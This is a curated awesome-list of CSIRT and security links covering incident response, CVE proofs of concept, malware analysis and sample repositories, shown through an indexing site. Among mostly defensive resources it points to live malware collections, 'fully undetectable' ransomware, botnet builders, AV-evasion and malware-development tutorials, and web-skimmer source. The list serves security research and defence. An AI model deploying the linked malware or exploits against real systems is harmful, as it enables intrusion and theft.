Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

https://github.com/Spacial/awesome-csirt

Awesome CSIRT is an curated list of links and resources in security and CSIRT daily activities.
https://github.com/Spacial/awesome-csirt

List: awesome-csirt

awesome awesome-list csirt cve exfiltration exploits malware-analysis pentesting poc reverse-engineering secure-programming security threat-intelligence

Last synced: 3 months ago
JSON representation

Awesome CSIRT is an curated list of links and resources in security and CSIRT daily activities.

Lists

README

        

# CSIRT [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)

**Please contribute through pull requests*- ;)

Another great list: [awesome-incident-response](https://github.com/meirwah/awesome-incident-response)

## Books

- Nice list [here](https://github.com/Spacial/csirt/blob/master/books.md) by [Cert.BR](http://www.cert.br)
- [Practical Cryptography for Developers](https://cryptobook.nakov.com/), [github](https://github.com/nakov/practical-cryptography-for-developers-book)
- [The Book of Secret Knowledge](https://github.com/trimstray/the-book-of-secret-knowledge)
- [Security Engineering](https://www.cl.cam.ac.uk/~rja14/book.html) — Third Edition
- [The Cyber Plumber's Handbook](https://cph.opsdisk.com/index.html#students)

## Links

- [FIRST](http://www.first.org)
- [Malware Analysis Resources](https://www.first.org/global/sigs/malware/resources/)
- [Cert.BR](http://www.cert.br) - useful [links](https://www.cert.br/links/)
- [7º Fórum Brasileiro de CSIRTs](https://www.cert.br/forum2018/)
- [9º Fórum Brasileiro de CSIRTs](https://cert.br/forum2020/)
- SANS Pen-Testing Resources: [Downloads](https://pen-testing.sans.org/resources/downloads)
- Some [list](https://github.com/Spacial/csirt/blob/master/SecurityProjects.md) of security projects
- [APT & CyberCriminal Campaign Collection](https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections)
- [Encoding vs. Encryption vs. Hashing vs. Obfuscation](https://danielmiessler.com/study/encoding-encryption-hashing-obfuscation/)
- [Shodan](https://www.shodan.io/): is the world's first search engine for Internet-connected devices. [Shodan 2000](https://2000.shodan.io/)
- [CriminalIP](https://www.criminalip.io/): Criminal IP is a specialized Cyber Threat Intelligence (CTI) search engine that allows users to search for various security-related information such as malicious IP addresses, domains, banners, etc. It can be widely integrated
- [hacking-tutorials](https://github.com/maestron/hacking-tutorials)
- [crypto](https://github.com/boazbk/crypto): Lecture notes for a course on cryptography
- [tink](https://github.com/google/tink/): Tink is a multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse.
- [SPLOITUS](https://sploitus.com/): Exploit search engine.
- [Vulmon](https://vulmon.com/): Vulmon is a vulnerability search engine.
- [CIS SecureSuite® Membership](https://www.cisecurity.org/cis-securesuite/)
- [CRYPTO101](https://www.crypto101.io/): Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels.
- [SMHasher](https://github.com/rurban/smhasher/) is a test suite designed to test the distribution, collision, and performance properties of non-cryptographic hash functions. [another repo](https://github.com/aappleby/smhasher)
- [CPDoS](https://cpdos.org/): Cache Poisoned Denial of Service
- [cacao](https://github.com/oasis-tcs/cacao): OASIS CACAO TC: Official repository for work of the [CACAO TC](https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cacao)
- [cti-documentation](https://github.com/oasis-open/cti-documentation)
- [The 4th in the 5th: Temporal Aspects of Cyber Operations](https://www.recordedfuture.com/cyber-operations-time/)
- [SOCless](https://twilio-labs.github.io/socless/): [The SOCless automation framework](https://github.com/twilio-labs/socless)
- [Open CSIRT Foundation](https://opencsirt.org/) - [SIM v3 Model](http://opencsirt.org/wp-content/uploads/2019/12/SIM3-mkXVIIIc.pdf) and [SIM3 Self Assessment](https://sim3-check.opencsirt.org).
- [Global Forum on Cyber Expertise (GFCE)](https://thegfce.org/).
- [Ten strategies of a world-class cybersecurity operations center](https://www.mitre.org/publications/all/ten-strategies-of-a-world-class-cybersecurity-operations-center)
- [my-infosec-awesome](https://github.com/pe3zx/my-infosec-awesome).
- [How to Secure Anything](https://github.com/veeral-patel/how-to-secure-anything). How to systematically secure anything: a repository about security engineering
- [Metasploitable3](https://github.com/rapid7/metasploitable3): is a VM that is built from the ground up with a large amount of security vulnerabilities.
- [Institute for Security and Technology](https://securityandtechnology.org/about-ist/): builds solutions to enhance the security of the global commons. Our goal is to provide the tools and insights needed for companies and governments to outpace emerging global security threats. Our non-traditional approach has a bias towards action, as we build trust across domains, provide unprecedented access, and deliver and implement solutions.
- [NIST'S CYBERSECURITY FRAMEWORK](https://www.nist.gov/cyberframework)
- [pluto-eris](https://github.com/daira/pluto-eris): Generator and supporting evidence for security of the Pluto/Eris half-pairing cycle of elliptic curves.
- [cset](https://github.com/cisagov/cset): Cybersecurity Evaluation Tool by CISA.gov.
- [comply](https://github.com/strongdm/comply): Compliance automation framework, focused on SOC2.
- [Illustrated X.509 Certificate](https://darutk.medium.com/illustrated-x-509-certificate-84aece2c5c2e)
- [Open Security Controls Assessment Language (OSCAL)](https://github.com/usnistgov/OSCAL): NIST is developing the Open Security Controls Assessment Language (OSCAL), a set of hierarchical, XML-, JSON-, and YAML-based formats that provide a standardized representations of information pertaining to the publication, implementation, and assessment of security controls.
- [DWF](https://github.com/distributedweaknessfiling/dwflist): The DWF Identifiers dataset, distributed weakness filing.
- [OASIS Common Security Advisory Framework (CSAF)](https://oasis-open.github.io/csaf-documentation/) [repo](https://github.com/oasis-tcs/csaf) [secvisogram](https://github.com/secvisogram/secvisogram) [editor](https://secvisogram.github.io/)
- [notrandom](https://github.com/fx5/not_random): reverse the Mersenne Twister.
- [OpenEX](https://www.openex.io/en/): Crisis drills planning platform. [repo](https://github.com/OpenEx-Platform/openex)
- [NCSI](https://ncsi.ega.ee/): The National Cyber Security Index is a global index, which measures the preparedness of countries to prevent cyber threats and manage cyber incidents.
- [THE EVOLUTION OF TRUST](https://ncase.me/trust/)

### Incident Response

- [Applying DevOps Principles in Incident Response](https://insights.sei.cmu.edu/devops/2015/09/applying-devops-principles-in-incident-response.html)
- [Pagerduty Incident Response](https://response.pagerduty.com/): This documentation covers parts of the PagerDuty Incident Response process.
- [security-training](https://github.com/PagerDuty/security-training): Public version of PagerDuty's employee security training courses.
- [incident-response-docs](https://github.com/PagerDuty/incident-response-docs): PagerDuty's Incident Response Documentation.
- [global-irt](https://github.com/FIRSTdotorg/global-irt): Global IRT (Incident Response Team) is a project to describe common IRT and abuse contact information
- [atc-react](https://github.com/atc-project/atc-react): A knowledge base of actionable Incident Response techniques
- [Request Tracker for Incident Response](https://bestpractical.com/rtir/)
- [Request Tracker](https://bestpractical.com/request-tracker)
- [Beagle](https://github.com/yampelo/beagle) is an incident response and digital forensics tool which transforms security logs and data into graphs.
- [CSIRT Schiltron: Training, Techniques, and Talent](https://www.first.org/resources/papers/conf2019/1100-CSIRT-Schiltron-Final.pdf)
- [Practical Tabletop Drills for CSIRTS - Pre-session Material](https://www.first.org/resources/papers/conf2019/FIRST-Conference-2019-06-Edinburgh-Practical-Tabletops-for-CSIRTs.pdf)
- [DFIRTrack](https://github.com/dfirtrack/dfirtrack): The Incident Response Tracking Application
- [FIR](https://github.com/certsocietegenerale/FIR/) (Fast Incident Response): is an cybersecurity incident management platform designed with agility and speed in mind.
- [Aurora Incident Response](https://github.com/cyb3rfox/Aurora-Incident-Response): Incident Response Documentation made easy. Developed by Incident Responders for Incident Responders.
- [timesketch](https://github.com/google/timesketch): Collaborative forensic timeline analysis.
- [FastIR Collector Linux](https://github.com/SekoiaLab/Fastir_Collector_Linux) (no longer maintained)
- [Critical Log Review Checklist for Security Incidents](https://zeltser.com/security-incident-log-review-checklist/)
- [Exercise in a Box](https://www.ncsc.gov.uk/information/exercise-in-a-box)
- [Incident response overview](https://docs.microsoft.com/en-us/security/compass/incident-response-overview)
- [How to Write and Execute Great Incident Response Playbooks](https://www.praetorian.com/blog/writing-great-ir-playbooks/)
- [Incident Response: Windows Cheatsheet](https://www.hackingarticles.in/incident-response-windows-cheatsheet/)
- [Incident Response: Windows Account Logon and logon Events](https://www.hackingarticles.in/incident-response-windows-account-logon-and-logon-events/)
- [Incident Response: Windows Account Management Event (Part 2)](https://www.hackingarticles.in/incident-response-windows-account-management-event-part-2/)
- [Incident Response- Linux Cheatsheet](https://www.hackingarticles.in/incident-response-linux-cheatsheet/)
- [Building Better CSIRTs Using Behavioral Psychology](https://i.blackhat.com/EU-21/Wednesday/EU-21-Orlando-Building-Better-CSIRTs-Using-Behavioral-Psychology.pdf) [link](https://www.blackhat.com/eu-21/briefings/schedule/index.html#building-better-csirts-using-behavioral-psychology-24331)
- [The features all Incident Response Plans need to have](https://blog.talosintelligence.com/2021/11/the-features-of-incident-response-plan.html)
- [Maltrail](https://github.com/stamparm/maltrail): Malicious traffic detection system

### Hashing

- [MD5 Decryption](https://www.md5online.org/md5-decrypt.html)
- [SHA-1 is a Shambles](https://sha-mbles.github.io/): First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust
- [Sha256 Algorithm Explained](https://sha256algorithm.com/) [code](https://github.com/dmarman/sha256algorithm)

## CVEs

- Some CVEs stuff and links [here](https://github.com/Spacial/csirt/blob/master/CVEsPoCs.md) and in [here](https://github.com/Spacial/csirt/tree/master/PoCs)
- [MikroTik](https://www.shodan.io/report/Re9jsGpB) search on shodan.
- [TROMMEL](https://github.com/CERTCC-Vulnerability-Analysis/trommel/): Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
- [cve_manager](https://github.com/aatlasis/cve_manager): A python script that a) parses NIST NVD CVEs, b) prcoesses and exports them to CSV files, c) creates a postgres database and imports all the data in it, d) provides query capabilities for this CVEs database.
- [dorkbot](https://github.com/utiso/dorkbot): Command-line tool to scan Google search results for vulnerabilities.
- [NotQuite0DayFriday](https://github.com/grimm-co/NotQuite0DayFriday): This is a repo which documents real bugs in real software to illustrate trends, learn how to prevent or find them more quickly.
- [Exploit Prediction Scoring System (EPSS)](https://www.first.org/epss/): The Exploit Prediction Scoring System (EPSS) is an open, data-driven effort for predicting when software vulnerabilities will be exploited. Our goal is to assist network defenders to better prioritize vulnerability remediation efforts.
- [CVE PoC](https://github.com/trickest/cve): Almost every publicly available CVE PoC.

## Malware Analysis

- [Awesome Malware Analysis](https://github.com/rshipp/awesome-malware-analysis): A curated list of awesome malware analysis tools and resources.
- Great online [course](https://malwareunicorn.org/workshops/re101.html) by [MalwareUnicorn](https://github.com/securedorg)
- [CS6038/CS5138 Malware Analysis, UC](https://class.malware.re/): [Introduction to Malware Analysis and Reverse Engineering](https://github.com/ckane/CS7038-Malware-Analysis)
- Some other botnets [list](https://github.com/Spacial/csirt/blob/master/botnets.md)
- [IKARUS anti.virus and its 9 exploitable kernel vulnerabilities](http://www.greyhathacker.net/?p=995)
- [Digital Certificates Used by Malware](http://www.ccssforum.org/malware-certificates.php)
- [Signed Malware – The Dataset](http://signedmalware.org/)
- [Malware Sample Sources for Researchers](https://zeltser.com/malware-sample-sources/)
- [Indicators: Champing at the Cyberbit](https://github.com/citizenlab/malware-indicators/tree/master/201712_Cyberbit)
- [Limon - Sandbox for Analyzing Linux Malwares](https://github.com/monnappa22/Limon)
- [A Dynamic Binary Instrumentation framework based on LLVM](https://github.com/quarkslab/QBDI)
- [Framework for building Windows malware, written in C++](https://github.com/richkmeli/Richkware)
- [binary ninja](https://binary.ninja/demo/)
- Analyzing a New macOS DNS Hijacker: [OSX/MaMi](https://objective-see.com/blog/blog_0x26.html)
- A PoC "malware" application with good intentions that aims to stress your anti-malware system: [al-khaser](https://github.com/LordNoteworthy/al-khaser)
- Great analysis of [mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10](https://www.joesandbox.com/analysis/46216/0/html)
- [Chaos: a Stolen Backdoor Rising Again](http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/)
- [Malware Indicators of Compromise (IOCs)](https://github.com/GoSecure/malware-ioc)
- [Puszek](https://github.com/Eterna1/puszek-rootkit): Yet another LKM rootkit for Linux. It hooks syscall table.
- [Joe Sandbox Cloud](https://github.com/joesecurity/joesandboxcloudapi) is a deep malware analysis platform which detects malicious files - API Wrapper.
- [Cuckoo Sandbox](https://cuckoosandbox.org): Automated Malware Analysis.
- [CBG](https://github.com/alainesp/CBG/): Cuckoo Breeding Ground Hash Table.
- [EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/february/eternalglue-part-two-a-rebuilt-notpetya-gets-its-first-execution-outside-of-the-lab/)
- [Malware web and phishing investigation](https://decentsecurity.com/#/malware-web-and-phishing-investigation/) by Decent Security.
- [A collection of tools for working with TrickBot](https://github.com/MalwareTech/TrickBot-Toolkit)
- [Forgot About Default Accounts? No Worries, GoScanSSH Didn’t](http://blog.talosintelligence.com/2018/03/goscanssh-analysis.html)
- [makin](https://github.com/secrary/makin) - reveal anti-debugging and anti-VM tricks.
- [TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time](https://arxiv.org/abs/1807.07838)
- [colental/byob: BYOB (Build Your Own Botnet)](https://github.com/colental/byob), another [byob](https://github.com/malwaredllc/byob)
- [Source Code for Exobot Android Banking Trojan Leaked Online](https://www.bleepingcomputer.com/news/security/source-code-for-exobot-android-banking-trojan-leaked-online/)
- [Ramnit’s Network of Proxy Servers](https://research.checkpoint.com/ramnits-network-proxy-servers/)
- [snake](https://github.com/countercept/snake): a malware storage zoo
- [A malware analysis kit for the novice](https://www.computerweekly.com/tip/A-malware-analysis-kit-for-the-novice)
- [malware-ioc](https://github.com/eset/malware-ioc): Indicators of Compromises (IOC) of our various investigations
- [pftriage](https://github.com/idiom/pftriage): Python tool and library to help analyze files during malware triage and analysis.
- [imaginaryC2](https://github.com/felixweyne/imaginaryC2#demo-use-case-simulating-trickbot-servers): Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.
- [When a malware is more complex than the paper.](https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257)
- [Vba2Graph](https://github.com/MalwareCantFly/Vba2Graph): Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents.
- [malwoverview](https://github.com/alexandreborges/malwoverview): Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples or a specific malware sample.
- SECT CTF 2018 :: [Gh0st](http://mslc.ctf.su/wp/sect-ctf-2018-gh0st/), More Smoked Leet Chicken
- [What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear](https://www.eset.com/us/about/newsroom/corporate-blog/what-you-need-to-know-about-lojax-the-new-stealthy-malware-from-fancy-bear/)
- [Linux.Malware](https://github.com/marcusbotacin/Linux.Malware): Additional Material for the Linux Malware Paper
- [PHP Malware Examination](https://blog.manchestergreyhats.co.uk/2018/11/07/php-malware-examination/)
- [Analysis of Linux.Haikai](https://www.securityartwork.es/2018/11/08/analysis-of-linux-haikai-inside-the-source-code/): inside the source code
- [Cylance vs. MBRKiller Wiper Malware](https://threatvector.cylance.com/en_us/home/cylance-vs-mbrkiller-wiper-malware.html).
- [Deep Analysis of TrickBot New Module pwgrab](https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html)
- [multiscanner](https://github.com/mitre/multiscanner): Modular file scanning/analysis framework.
- [FCL](https://github.com/chenerlich/FCL): FCL (Fileless Command Lines) - Known command lines of fileless malicious executions.
- [Mac malware combines EmPyre backdoor and XMRig miner](https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/)
- [The Full Guide Understanding Fileless Malware Infections](https://www.peerlyst.com/posts/understanding-fileless-malware-infections-the-full-guide-andra-zaharia)
- ['Injection' Without Injection](https://secrary.com/Random/injectionwithoutinjection/)
- [Analysis of Neutrino Bot Sample](http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html) (dated 2018-08-27): In this post I analyze a Neutrino Bot sample.
- [pafish](https://github.com/a0rtega/pafish): Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.
- [Thunderstrike2 details](https://trmm.net/Thunderstrike2_details): This is the annotated transcript of our DefCon 23 / BlackHat 2015 talk, which presented the full details of Thunderstrike 2, the first firmware worm for Apple's Macs that can spread via both software or Thunderbolt hardware accessories and writes itself to the boot flash on the system's motherboard.
- [Malboxes](https://gosecure.net/2017/02/16/introducing-malboxes-a-tool-to-build-malware-analysis-virtual-machines/): a Tool to Build Malware Analysis Virtual Machines, [github](https://github.com/GoSecure/malboxes)
- [Triton is the world’s most murderous malware, and it’s spreading](https://www.technologyreview.com/s/613054/cybersecurity-critical-infrastructure-triton-malware/)
- [Cloak and Dagger — Mobile Malware Techniques Demystified](https://medium.com/@targetpractice/cloak-and-dagger-malware-techniques-demystified-c4d8a035b94e)
- [IceBox](https://github.com/thalium/icebox): Icebox is a Virtual Machine Introspection solution that enable you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility.
- Malware Development:
- [Welcome to the Dark Side: Part 1](https://niiconsulting.com/checkmate/2018/02/malware-development-welcome-dark-side-part-1/)
- [Welcome to the Dark Side: Part 2-1](https://niiconsulting.com/checkmate/2018/02/malware-development-welcome-dark-side-part-2-1/)
- [Welcome to the Dark Side: Part 2-2](https://niiconsulting.com/checkmate/2018/03/malware-development-welcome-dark-side-part-2-2/)
- [Welcome to the Dark Side: Part 3](https://niiconsulting.com/checkmate/2018/03/malware-development-welcome-dark-side-part-3/)
- [Welcome to the Dark Side: Part 4](https://niiconsulting.com/checkmate/2018/03/malware-development-welcome-to-the-dark-side-part-4/)
- [Command and Control via TCP Handshake](https://thesw4rm.gitlab.io/nfqueue_c2/2019/09/15/Command-and-Control-via-TCP-Handshake/)
- Joel Sandbox Analysis Report [wdeQEksXgm](https://www.joesecurity.org/reports/report-78d97c9b50029da32ada8e16e1979b28.html)
- [emotet](https://www.bleepingcomputer.com/news/security/emotet-revived-with-large-spam-campaigns-around-the-world/): [Daily Emotet IoCs and Notes for 09/18/19](https://paste.cryptolaemus.com/emotet/2019/09/18/emotet-malware-IoCs_09-18-19.html)
- [Aleph](https://github.com/merces/aleph): OpenSource /Malware Analysis Pipeline System
- [Aleph](https://github.com/alephre/aleph): File Analysis Pipeline
- [Anti-VM Technique with MSAcpi_ThermalZoneTemperature](https://medium.com/@DebugActiveProcess/anti-vm-techniques-with-msacpi-thermalzonetemperature-32cfeecda802), [powershell](https://gist.github.com/teixeira0xfffff/36293713c254c69a7ba2353e8d64afce)
- [AMSI as a Service](https://medium.com/@two06/amsi-as-a-service-automating-av-evasion-2e2f54397ff9) — Automating AV Evasion: AMSI, the “AntiMalware Scan Interface”, has been around for some time. In a broad sense, it’s a component of Windows 10 which allows applications to integrate with AV products, though most people know it for it’s ability to make file-less malware visible to AV engines.
- [A collection of x64dbg scripts](https://github.com/x64dbg/Scripts). Feel free to submit a pull request to add your script.
- [CAPA](https://github.com/fireeye/capa/): The FLARE team's open-source tool to identify capabilities in executable files. [capa-rules](https://github.com/fireeye/capa-rules)
- [DRAKVUF Sandbox](https://github.com/CERT-Polska/drakvuf-sandbox) - automated hypervisor-level malware analysis system.
- [Unprotect](https://medium.com/@tom_rock/unprotect-project-5f80a88d9bdd): The [search engine](https://search.unprotect.it/map) about Malware Evasion Techniques
- [HiJackThis Fork v3](https://github.com/dragokas/hijackthis): A free utility that finds malware, adware and other security threats.
- [FRITZFROG](https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/): A NEW GENERATION OF PEER-TO-PEER BOTNETS. [detection script](https://github.com/guardicore/labs_campaigns/tree/master/FritzFrog)
- [Tracking A Malware Campaign Through VT](https://isc.sans.edu/forums/diary/Tracking+A+Malware+Campaign+Through+VT/26498/)
- [speakeasy](https://github.com/fireeye/speakeasy): Windows kernel and user mode emulation.
- [malware analysis and machine learning](https://twitter.com/alg0phelia/status/1303058786446385153) [If you are new to machine learning and want to start learning about building models to classify malware, I recommend the following](https://twitter.com/alg0phelia/status/1302281270496497664)
- [GhostDNSbusters](https://team-cymru.com/blog/2020/09/08/ghostdnsbusters/): Illuminating GhostDNS Infrastructure
- [The Tetrade](https://securelist.com/the-tetrade-brazilian-banking-malware/97779/): Brazilian banking malware goes global
- [Is macOS under the biggest malware attack ever?](https://reverse.put.as/2020/09/17/evilquest-revisited/): EvilQuest/ThiefQuest malware.
- [Hybrid Analysis](https://www.hybrid-analysis.com/)
- Evading Static Machine Learning Malware Detection Models – [Part 1: The Black-Box Approach](https://blog.compass-security.com/2020/10/evading-static-machine-learning-malware-detection-models-the-black-box-approach/)
- [ember](https://github.com/endgameinc/ember): The EMBER dataset is a collection of features from PE files that serve as a benchmark dataset for researchers.
- [Complementar resources to follow the EHREM course by GoHacking (Malware Reverse Engineering)](https://github.com/nuxmorpheus/EHREM/)
- [Coldfire](https://github.com/redcode-labs/Coldfire): Golang malware development library
- [pei](https://github.com/Silva97/pei), the PE Injector - Inject code on 32-bit and 64-bit PE executables
- [The Art Of Mac Malware: Analysis](https://taomm.org/vol1/analysis.html)
- [Freki](https://github.com/crhenr/freki):  Malware analysis platform
- [Ten process injection techniques: A technical survey of common and trending process injection techniques](https://www.elastic.co/pt/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process)
- [Sandbox detection and evasion techniques. How malware has evolved over the last 10 years](https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/)
- [malware_training_vol1](https://github.com/hasherezade/malware_training_vol1): Materials for Windows Malware Analysis training (volume 1).
- [Go Assembly on the arm64](https://www.symbolcrash.com/2021/03/02/go-assembly-on-the-arm64/)
- [Exploit Kit still sharpens a sword](https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html)
- [Pingback](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/): Backdoor At The End Of The ICMP Tunnel.
- [WinAPI-Tricks](https://github.com/vxunderground/WinAPI-Tricks): Collection of various WINAPI tricks / features used or abused by Malware.
- [pyWhat](https://github.com/bee-san/pyWhat): Identify anything. pyWhat easily lets you identify emails, IP addresses, and more. Feed it a .pcap file or some text and it'll tell you what it is!
- [Transacted Hollowing](https://github.com/hasherezade/transacted_hollowing): a PE injection technique, hybrid between ProcessHollowing and ProcessDoppelgänging.
- [Cuckoo Sandbox Overview](https://www.varonis.com/blog/cuckoo-sandbox/)
- [Malvuln](https://www.malvuln.com/): Finding and exploiting vulnerable Malware.
- [Machine Learning for Static Malware Analysis, with University College London](https://research.nccgroup.com/2021/06/07/research-paper-machine-learning-for-static-malware-analysis-with-university-college-london/)
- [Malware Scarecrow](https://github.com/kaganisildak/malwarescarecrow)
- [Vigilante malware rats out software pirates while blocking ThePirateBay](https://news.sophos.com/en-us/2021/06/17/vigilante-antipiracy-malware/). [twitter thread](https://twitter.com/SophosLabs/status/1405548622725459970)
- [Necro Python bot adds new exploits and Tezos mining to its bag of tricks](https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html)
- [Too Log; Didn't Read — Unknown Actor Using CLFS Log Files for Stealth](https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html): The Mandiant Advanced Practices team recently discovered a new malware family we have named PRIVATELOG and its installer, STASHLOG.
- [Made in China: OSX.ZuRu](https://objective-see.com/blog/blog_0x66.html): trojanized apps spread malware, via sponsored search results
- [DBatLoader: Abusing Discord to Deliver Warzone RAT](https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat)
- [Siloscape](https://unit42.paloaltonetworks.com/siloscape/): First Known Malware Targeting Windows Containers to Compromise Cloud Environments
- [DRIDEX](https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/): Analysing API Obfuscation Through VEH
- [The Return of the Malwarebytes Crackme](https://matth.dmz42.org/posts/2021/the-return-of-the-malwarebytes-crackme/), [Malwarebytes Crackme 2021](https://github.com/JLeow00/malwarebytes-crackme-3): Writeup and scripts for the 2021 malwarebytes crackme. [Malwarebytes CrackMe 3 2021 Solution](https://rainbowpigeon.me/posts/malwarebytes-crackme-3-2021/)
- [Corvus](https://corvus.inf.ufpr.br/): is a dynamic analysis system for malware targeting Windows, Linux, Android and PDFs. Behavioral heuristics are also applied to identify suspicious activities exhibited by unknown programs. [API](https://corvus.inf.ufpr.br/docs/api.html)
- [MalAPI.io](https://malapi.io/) maps Windows APIs to common techniques used by malware.
- [Malicious Document Analysis: Example 1](https://exploitreversing.com/2021/11/02/malicious-document-analysis-example-1/) [mda](https://exploitreversing.files.wordpress.com/2021/11/mda_1-1.pdf)
- [APIVADS](https://ieeexplore.ieee.org/document/9690881): A Novel Privacy-Preserving Pivot Attack Detection Scheme Based On Statistical Pattern Recognition
- [A new secret stash for “fileless” malware](https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/)
- [Qu1cksc0pe](https://github.com/CYB3RMX/Qu1cksc0pe): All-in-One malware analysis tool.

### Web Malwares

- [Boa release](https://boa-dev.github.io/) is an experimental Javascript lexer, parser and compiler written in Rust.
- [midrashim](https://github.com/guitmz/midrashim): x64 ELF infector written in Assembly
- [d0zer](https://github.com/sad0p/d0zer): Elf binary infector written in Go.
- [New evasion techniques found in web skimmers](https://blog.malwarebytes.com/threat-analysis/2019/12/new-evasion-techniques-found-in-web-skimmers/)
- [digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process](https://twitter.com/AffableKraut/status/1333258498910588928). [paypal endpoint called via cors-anywhere](https://gist.github.com/krautface/e9fece3a3271bc19bd198a72fa8f363e), [stega-loader](https://gist.github.com/krautface/47144708de5ebf78713db10bb486ea87), [paypal-cors-deob-good.js](https://gist.github.com/krautface/dee181bec40b8e99e21fc932d9922df2), [paypal-cors-deob-with-comments.js](https://gist.github.com/krautface/933b050eb363e20cf1bc925c87a9290f), [fake-paypal.html](https://gist.github.com/krautface/243aabc63f6f7424ff75e8e9cbd35016)

### Malware Samples

- [Automated Malware Analysis Report for D6pnpvG2z7](https://www.joesecurity.org/reports/report-source-fffb8d51838af6bb742e84b8b16239bb.html) - Generated by Joe Sandbox
- [Mac Malware](https://objective-see.com/malware.html)
- [virii](https://github.com/guitmz/virii): Collection of ancient computer virus source codes
- [Detricking TrickBot Loader](https://www.cert.pl/en/news/single/detricking-trickbot-loader/): TrickBot (TrickLoader) is a modular financial malware that first surfaced in October in 20161. Almost immediately researchers have noticed similarities with a credential-stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. [decoder](https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-07-29-trickbot-decoded-first-loader-template.vk.raw), [tweet](https://twitter.com/VK_Intel/status/1155923795674316801)
- [Analysis of Emotet v4](https://www.cert.pl/en/news/single/analysis-of-emotet-v4/)
- [abuse.ch Feodo Tracker Botnet C2 IP Blocklist](https://feodotracker.abuse.ch/downloads/ipblocklist_recommended.txt)
- [simple_ransomware](https://github.com/bing0o/simple_ransomware): this script isn't ransomware, it's just script collect all your system files and encrypt it, Can be considered it a simple ransomware
- [Mirai "Batkek"](https://gist.github.com/unixfreaxjp/2bc9100d167992a768642777d850e1c0)
- [FinFisher Filleted 🐟](https://objective-see.com/blog/blog_0x4F.html), a triage of the FinSpy (macOS) malware
- [Ryuk’s Return](https://thedfirreport.com/2020/10/08/ryuks-return/)
- [Ryuk Ransomware](https://community.riskiq.com/article/0bcefe76): Extensive Attack Infrastructure Revealed
- [Collaboration between FIN7 and the RYUK group, a Truesec Investigation](https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/)
- [Android-Malware-Samples](https://github.com/fouroctets/Android-Malware-Samples): Android Malware Samples
- [Architecture of a ransomware](https://medium.com/bugbountywriteup/architecture-of-a-ransomware-1-2-1b9fee757fcb)
- [TRAFFIC ANALYSIS EXERCISE - OMEGACAST](https://malware-traffic-analysis.net/2020/10/22/index.html)
- [Malware Samples](https://github.com/jstrosch/malware-samples): Malware samples and other artifacts
- [After finding skimmers in SVG files last week, we now discovered a #magecart skimmer in perfectly valid CSS.](https://twitter.com/sansecio/status/1336614850047381506)
- [#Buer #BuerLoader](https://twitter.com/ffforward/status/1338876857647849473)
- [SoReL-20M](https://github.com/sophos-ai/SOREL-20M): Sophos-ReversingLabs 20 million sample dataset.
- [minizinh0-FUD](https://github.com/gnxbr/Fully-Undetectable-Techniques/): A Fully Undetectable Ransomware.
- [Purple Fox Rootkit Now Propagates as a Worm](https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/)
- [How to analyze mobile malware: a Cabassous/FluBot Case study](https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/)
- [Malware Analysis of a Password Stealer](https://www.youtube.com/watch?v=MaPXDCq-Gf4): n this video we dive into the analysis of Poulight malware, which is a .net based password stealer.
- [Guildma](https://isc.sans.edu/forums/diary/Guildma+is+now+using+Finger+and+Signed+Binary+Proxy+Execution+to+evade+defenses/27482/)
- [Darkside RaaS in Linux version](https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version)

### Repos

- [A repository of LIVE malwares for your own joy and pleasure](https://github.com/ytisf/theZoo): [theZoo](http://thezoo.morirt.com)
- [malware.one](https://malware.one/index.php) is a binary substring searchable malware catalog containing terabytes of malicious code.
- [Beginner Malware Reversing Challenges](https://www.malwaretech.com/beginner-malware-reversing-challenges), by MalwareTech. [repo](https://github.com/MalwareTech/Beginner-Reversing-Challenges)
